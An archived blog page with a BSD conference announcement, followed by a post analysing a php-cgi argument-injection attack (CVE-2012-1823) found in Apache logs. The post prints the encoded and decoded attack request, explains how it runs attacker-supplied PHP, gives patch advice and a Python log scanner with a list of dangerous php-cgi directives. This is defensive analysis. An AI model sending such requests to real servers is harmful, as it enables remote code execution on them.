Archive
vBSDcon 2013 Registrations Now Open!
In April 2013, Verisign announced vBSDcon 2013, to be held October 25 – 27, 2013 in Dulles, VA. The conference, organised along unconference lines, will feature speakers such as David Chisnall, Luigi Rizzo, Baptiste Daroussin, Henning Brauer, Reyk Floeter, and others. vBSDcon will include events like hacker lounges, doc sprints, BSDA exams, and a mid-conference social*.
Over the past few months Verisign has been building out the conference website at http://www.vbsdcon.com/. It carries full details of the schedule, agenda, and speakers for vBSDcon. The most recent addition to the site: registration is now open!
* The schedule is subject to change without notice. The BSDA exams are hosted by the BSD Certification group and are not an official part of vBSDcon.
Apache/Plesk php Exploit
While reviewing web server logs recently, I spotted the following attack…
216.237.113.27 - - [07/Aug/2013:08:12:14 -0400] "POST
/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F
%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D
%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+
%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F
%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75
%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E
%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61
%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D
%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
404 209 "-" "-"
Which decodes to:
/phppath/php?-d allow_url_include=on -d safe_mode=off
-d suhosin.simulation=on -d disable_functions="" -d
open_basedir=none -d auto_prepend_file=php://input -n
The percent-encoding is not mere obfuscation. Under the CGI rule that mod_cgi follows (RFC 3875 section 4.4), a query string that contains no unencoded "=" is split on "+" and handed to the CGI program as command-line arguments, so php-cgi starts with the decoded "-d ..." directives in its argv. Those directives enable allow_url_include, switch off safe_mode, open_basedir and disable_functions, put Suhosin into simulation mode, and set auto_prepend_file to php://input, so whatever PHP code the attacker sent in the POST body runs before the requested script; "-n" additionally skips the server's php.ini.
One precondition for a vulnerable deployment is an Apache configuration that exposes the php-cgi binary's directory directly through a ScriptAlias such as:
ScriptAlias /phppath/ "/usr/bin/"
Plesk installations, and any other setup carrying an alias like the one above, should be patched: the underlying flaw is the php-cgi query-string argument injection (CVE-2012-1823, fully addressed in PHP 5.3.13 and 5.4.3), and the alias itself should be removed or access-restricted where it is not needed. Note that the request above drew a 404 on this server, so the path was not served here; a 200 (or any non-404) response to such a request warrants immediate investigation of the POST body and the host. Check the references below for more detailed information regarding this vulnerability.
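To turn the log entry above into something that can be run across a whole access log, here is an added Python example (not code from the original post). It parses Apache combined-format lines, applies the same split-on-"+" rule mod_cgi uses to turn a query string without a literal "=" into argv, peels double-encoding, and flags the php-cgi switches and INI directives an attacker would send. The sample log is constructed: the first entry reproduces the request from the post, the second is a benign request, and the third is a double-encoded "-s" (dump source) probe against a hypothetical /cgi-bin/php alias.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Bare php-cgi switches worth flagging when they reach argv, and INI directives
# that, set through -d, disable protections or load attacker-supplied input.
BARE_OPTS = ("-s", "-n", "-T")
DANGEROUS_INI = ("auto_prepend_file", "allow_url_include", "disable_functions",
                 "open_basedir", "safe_mode", "suhosin.")

# Request target from the log entry in the post (hex copied verbatim).
ATTACK_TARGET = (
    "/%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F"
    "%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D"
    "%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+"
    "%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F"
    "%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75"
    "%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E"
    "%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61"
    "%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D"
    "%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E"
)

# Constructed sample log: the post's entry, a benign request, and a
# double-encoded "-s" probe against a hypothetical /cgi-bin/php alias.
SAMPLE_LOG = [
    '216.237.113.27 - - [07/Aug/2013:08:12:14 -0400] "POST ' + ATTACK_TARGET
    + ' HTTP/1.1" 404 209 "-" "-"',
    '203.0.113.5 - - [07/Aug/2013:08:13:02 -0400] '
    '"GET /index.php?page=about&d=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/Aug/2013:08:14:40 -0400] '
    '"GET /cgi-bin/php?%252Ds HTTP/1.1" 200 318 "-" "-"',
]


def cgi_argv(raw_query):
    """RFC 3875 section 4.4 rule as applied by mod_cgi (assumed here): when the
    raw query string holds no unencoded '=', split it on '+' and percent-decode
    each piece; those pieces become the CGI program's argv."""
    if not raw_query or "=" in raw_query:
        return []
    return [unquote(piece) for piece in raw_query.split("+") if piece]


def peel(value, rounds=3):
    """Undo extra percent-encoding layers (bounded) to expose double-encoded probes."""
    for _ in range(rounds):
        if "%" not in value:
            break
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_args(argv):
    """Return the php-cgi options in argv that an attacker would use."""
    flags = []
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg in BARE_OPTS:
            flags.append(arg)
        elif arg.startswith("-d"):
            if arg == "-d":            # directive is the next argument
                i += 1
                directive = argv[i] if i < len(argv) else ""
            else:                      # attached form: -dallow_url_include=on
                directive = arg[2:]
            if directive.startswith(DANGEROUS_INI):
                flags.append("-d " + directive)
        i += 1
    return flags


def analyse(line):
    """Parse one log line and report whether it carries php-cgi argument injection."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "line": line}
    path, _, raw_query = m.group("target").partition("?")
    argv = [peel(a) for a in cgi_argv(raw_query)]
    flags = flag_args(argv)
    return {
        "parsed": True,
        "host": m.group("host"),
        "path": peel(path),
        "status": int(m.group("status")),
        "argv": argv,
        "argv_text": " ".join(argv),
        "flags": flags,
        "attack": bool(flags),
    }


def scan(lines):
    """Return the analysis records for lines that look like php-cgi argument injection."""
    return [r for r in map(analyse, lines) if r.get("attack")]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        verdict = "path not served (404)" if r["status"] == 404 else "investigate"
        print(f'{r["host"]} {r["path"]} status={r["status"]} {verdict}')
        print("  argv:", r["argv_text"])
        print("  flags:", ", ".join(r["flags"]))
```

The status code is reported alongside the decoded argv because it decides the follow-up: a 404, as in the post, means the aliased path was not served; a 200 against a php-cgi path with these switches means the POST body (which the access log does not record) very likely executed and the host needs a proper incident response.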
References
Disclaimer
This post is provided for informational purposes only. Test extensively before implementing any of the changes discussed here.